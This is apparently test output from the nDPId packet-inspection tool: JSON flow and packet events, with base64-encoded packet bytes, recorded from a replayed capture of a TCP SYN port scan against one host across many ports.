+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsjnEAADUGhQGsEAAIQA2GNIzTI4zdU4MZAAAAAGACCAANAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsG1AAADIG+yKsEAAIQA2GNIzTFz7dU4MZAAAAAGACDAAVTgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsYUcAADEGtiusEAAIQA2GNIzTVEPdU4MZAAAAAGACCADcSAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs2SUAACUGSk2sEAAIQA2GNIzTBB7dU4MZAAAAAGACCAAsbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsyi8AACkGVUOsEAAIQA2GNIzTA\/7dU4MZAAAAAGACCAAsjgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsoM4AACgGf6SsEAAIQA2GNIzTBhTdU4MZAAAAAGACBAAueAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsho4AACUGnOSsEAAIQA2GNIzTB4\/dU4MZAAAAAGACCAAo\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nsAACkGKPesEAAIQA2GNIzTBArdU4MZAAAAAGACCAAsggAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAseCYAADUGm0ysEAAIQA2GNIzTB\/vdU4MZAAAAAGACCAAokQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsC2kAACgGFQqsEAAIQA2GNIzTIGLdU4MZAAAAAGACBAAUKgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsiWIAADkGhhCsEAAIQA2GNIzTCRPdU4MZAAAAAGACCAAneQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/DUAAC0GHz2sEAAIQA2GNIzTE5HdU4MZAAAAAGACCAAc+wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACcG5gysEAAIQA2GNIzTGiTdU4MZAAAAAGACEAAOaAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsqMAAACwGc7KsEAAIQA2GNIzTJ+fdU4MZAAAAAGACBAAMpQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlMAACYG5B+sEAAIQA2GNIzTHcvdU4MZAAAAAGACDAAOwQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADgGgXusEAAIQA2GNIzTBA\/dU4MZAAAAAGACBAAwfQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNkAADgG+5msEAAIQA2GNIzTAmjdU4MZAAAAAGACBAAyJAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/MAAADIGGbKsEAAIQA2GNIzTJyndU4MZAAAAAGACDAAFYwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs4i0AAC4GOEWsEAAIQA2GNIzTDSvdU4MZAAAAAGACDAAfYQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYYAADoGgOysEAAIQA2GNIzT1w\/dU4MZAAAAAGACDABVfAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs45YAADgGLNysEAAIQA2GNIzTBE7dU4MZAAAAAGACBAAwPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAsjPEAADMGiIGsEAAIQA2GNIzSFa7dUoMYAAAAAGACEAAS4QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAstTEAADcGXEGsEAAIQA2GNIzSCk7dUoMYAAAAAGACEAAeQQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAskyUAADIGg02sEAAIQA2GNIzSAgPdUoMYAAAAAGACDAAqjAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
